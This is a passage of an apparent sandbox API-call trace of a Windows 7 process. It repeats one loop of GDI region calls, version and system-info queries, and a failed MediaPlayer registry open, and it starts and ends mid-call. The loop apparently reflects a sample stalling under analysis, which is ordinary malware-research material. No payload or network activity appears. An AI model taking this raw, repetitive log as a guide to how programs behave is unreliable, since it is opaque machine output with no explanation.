lpPaint=0x1817cc) returned 0x0 [0091.202] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.202] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.202] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.202] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.202] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe10401dc [0091.202] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe30401d9 [0091.202] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a8c [0091.202] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a8d [0091.202] CombineRgn (hrgnDst=0x1045a8c, hrgnSrc1=0xe10401dc, hrgnSrc2=0xe30401d9, iMode=1) returned 1 [0091.202] CombineRgn (hrgnDst=0x1045a8d, hrgnSrc1=0xe10401dc, hrgnSrc2=0xe30401d9, iMode=4) returned 2 [0091.202] CreateSolidBrush (color=0xff) returned 0x2105a8b [0091.202] CreateSolidBrush (color=0xff0000) returned 0x1105a8e [0091.202] DeleteObject (ho=0x1105a8e) returned 1 [0091.202] DeleteObject (ho=0xe30401d9) returned 1 [0091.202] DeleteObject (ho=0xe10401dc) returned 1 [0091.202] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.202] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.202] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.202] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.202] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.202] BeginPath (hdc=0x0) returned 0 [0091.202] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.202] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.202] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.202] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.203] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.203] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.203] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.203] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.203] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe40401d9 [0091.203] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe20401dc [0091.203] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a8f [0091.203] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a90 [0091.203] CombineRgn (hrgnDst=0x1045a8f, hrgnSrc1=0xe40401d9, hrgnSrc2=0xe20401dc, iMode=1) returned 1 [0091.203] CombineRgn (hrgnDst=0x1045a90, hrgnSrc1=0xe40401d9, hrgnSrc2=0xe20401dc, iMode=4) returned 2 [0091.203] CreateSolidBrush (color=0xff) returned 0x2105a8e [0091.203] CreateSolidBrush (color=0xff0000) returned 0x1105a91 [0091.203] DeleteObject (ho=0x1105a91) returned 1 [0091.203] DeleteObject (ho=0xe20401dc) returned 1 [0091.203] DeleteObject (ho=0xe40401d9) returned 1 [0091.203] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.203] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.203] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.203] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.203] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.203] BeginPath (hdc=0x0) returned 0 [0091.203] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.203] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.203] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.203] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.203] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.203] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.203] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.203] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.204] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe30401dc [0091.204] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe50401d9 [0091.204] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a92 [0091.204] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a93 [0091.204] CombineRgn (hrgnDst=0x1045a92, hrgnSrc1=0xe30401dc, hrgnSrc2=0xe50401d9, iMode=1) returned 1 [0091.204] CombineRgn (hrgnDst=0x1045a93, hrgnSrc1=0xe30401dc, hrgnSrc2=0xe50401d9, iMode=4) returned 2 [0091.204] CreateSolidBrush (color=0xff) returned 0x2105a91 [0091.204] CreateSolidBrush (color=0xff0000) returned 0x1105a94 [0091.204] DeleteObject (ho=0x1105a94) returned 1 [0091.204] DeleteObject (ho=0xe50401d9) returned 1 [0091.204] DeleteObject (ho=0xe30401dc) returned 1 [0091.204] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.204] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.204] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.204] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.204] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.204] BeginPath (hdc=0x0) returned 0 [0091.204] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.204] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.204] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.204] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.204] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.204] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.204] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.204] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.204] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe60401d9 [0091.204] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe40401dc [0091.204] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a95 [0091.204] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a96 [0091.204] CombineRgn (hrgnDst=0x1045a95, hrgnSrc1=0xe60401d9, hrgnSrc2=0xe40401dc, iMode=1) returned 1 [0091.204] CombineRgn (hrgnDst=0x1045a96, hrgnSrc1=0xe60401d9, hrgnSrc2=0xe40401dc, iMode=4) returned 2 [0091.204] CreateSolidBrush (color=0xff) returned 0x2105a94 [0091.204] CreateSolidBrush (color=0xff0000) returned 0x1105a97 [0091.204] DeleteObject (ho=0x1105a97) returned 1 [0091.204] DeleteObject (ho=0xe40401dc) returned 1 [0091.204] DeleteObject (ho=0xe60401d9) returned 1 [0091.204] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.204] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.205] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.205] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.205] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.205] BeginPath (hdc=0x0) returned 0 [0091.205] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.205] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.205] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.205] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.205] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.205] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.205] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.205] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.205] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe50401dc [0091.205] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe70401d9 [0091.205] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a98 [0091.205] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a99 [0091.205] CombineRgn (hrgnDst=0x1045a98, hrgnSrc1=0xe50401dc, hrgnSrc2=0xe70401d9, iMode=1) returned 1 [0091.205] CombineRgn (hrgnDst=0x1045a99, hrgnSrc1=0xe50401dc, hrgnSrc2=0xe70401d9, iMode=4) returned 2 [0091.205] CreateSolidBrush (color=0xff) returned 0x2105a97 [0091.205] CreateSolidBrush (color=0xff0000) returned 0x1105a9a [0091.205] DeleteObject (ho=0x1105a9a) returned 1 [0091.205] DeleteObject (ho=0xe70401d9) returned 1 [0091.205] DeleteObject (ho=0xe50401dc) returned 1 [0091.205] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.205] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.205] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.205] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.205] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.205] BeginPath (hdc=0x0) returned 0 [0091.205] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.205] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.205] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.205] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.205] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.205] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.205] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.205] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.206] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe80401d9 [0091.206] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe60401dc [0091.206] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a9b [0091.206] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a9c [0091.206] CombineRgn (hrgnDst=0x1045a9b, hrgnSrc1=0xe80401d9, hrgnSrc2=0xe60401dc, iMode=1) returned 1 [0091.206] CombineRgn (hrgnDst=0x1045a9c, hrgnSrc1=0xe80401d9, hrgnSrc2=0xe60401dc, iMode=4) returned 2 [0091.206] CreateSolidBrush (color=0xff) returned 0x2105a9a [0091.206] CreateSolidBrush (color=0xff0000) returned 0x1105a9d [0091.206] DeleteObject (ho=0x1105a9d) returned 1 [0091.206] DeleteObject (ho=0xe60401dc) returned 1 [0091.206] DeleteObject (ho=0xe80401d9) returned 1 [0091.206] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.206] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.206] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.206] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.206] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.206] BeginPath (hdc=0x0) returned 0 [0091.206] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.206] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.206] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.206] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.206] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.206] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.206] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.206] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.206] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe70401dc [0091.206] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe90401d9 [0091.206] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a9e [0091.206] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a9f [0091.206] CombineRgn (hrgnDst=0x1045a9e, hrgnSrc1=0xe70401dc, hrgnSrc2=0xe90401d9, iMode=1) returned 1 [0091.206] CombineRgn (hrgnDst=0x1045a9f, hrgnSrc1=0xe70401dc, hrgnSrc2=0xe90401d9, iMode=4) returned 2 [0091.206] CreateSolidBrush (color=0xff) returned 0x2105a9d [0091.206] CreateSolidBrush (color=0xff0000) returned 0x1105aa0 [0091.207] DeleteObject (ho=0x1105aa0) returned 1 [0091.207] DeleteObject (ho=0xe90401d9) returned 1 [0091.207] DeleteObject (ho=0xe70401dc) returned 1 [0091.207] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.207] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.207] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.207] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.207] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.207] BeginPath (hdc=0x0) returned 0 [0091.207] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.207] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.207] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.207] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.207] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.207] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.207] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.207] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.207] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xea0401d9 [0091.207] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe80401dc [0091.207] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aa1 [0091.207] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aa2 [0091.207] CombineRgn (hrgnDst=0x1045aa1, hrgnSrc1=0xea0401d9, hrgnSrc2=0xe80401dc, iMode=1) returned 1 [0091.207] CombineRgn (hrgnDst=0x1045aa2, hrgnSrc1=0xea0401d9, hrgnSrc2=0xe80401dc, iMode=4) returned 2 [0091.207] CreateSolidBrush (color=0xff) returned 0x2105aa0 [0091.207] CreateSolidBrush (color=0xff0000) returned 0x1105aa3 [0091.207] DeleteObject (ho=0x1105aa3) returned 1 [0091.207] DeleteObject (ho=0xe80401dc) returned 1 [0091.207] DeleteObject (ho=0xea0401d9) returned 1 [0091.207] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.207] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.207] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.207] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.207] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.207] BeginPath (hdc=0x0) returned 0 [0091.207] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.207] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.207] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.208] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.208] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.208] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.208] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.208] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.208] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe90401dc [0091.208] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xeb0401d9 [0091.208] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aa4 [0091.208] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aa5 [0091.208] CombineRgn (hrgnDst=0x1045aa4, hrgnSrc1=0xe90401dc, hrgnSrc2=0xeb0401d9, iMode=1) returned 1 [0091.208] CombineRgn (hrgnDst=0x1045aa5, hrgnSrc1=0xe90401dc, hrgnSrc2=0xeb0401d9, iMode=4) returned 2 [0091.208] CreateSolidBrush (color=0xff) returned 0x2105aa3 [0091.208] CreateSolidBrush (color=0xff0000) returned 0x1105aa6 [0091.208] DeleteObject (ho=0x1105aa6) returned 1 [0091.208] DeleteObject (ho=0xeb0401d9) returned 1 [0091.208] DeleteObject (ho=0xe90401dc) returned 1 [0091.208] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.208] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.208] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.208] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.208] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.208] BeginPath (hdc=0x0) returned 0 [0091.208] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.208] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.208] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.208] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.208] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.208] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.208] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.208] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.208] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xec0401d9 [0091.208] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xea0401dc [0091.208] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aa7 [0091.209] CreateRectRgn (x1=0, y1=0, 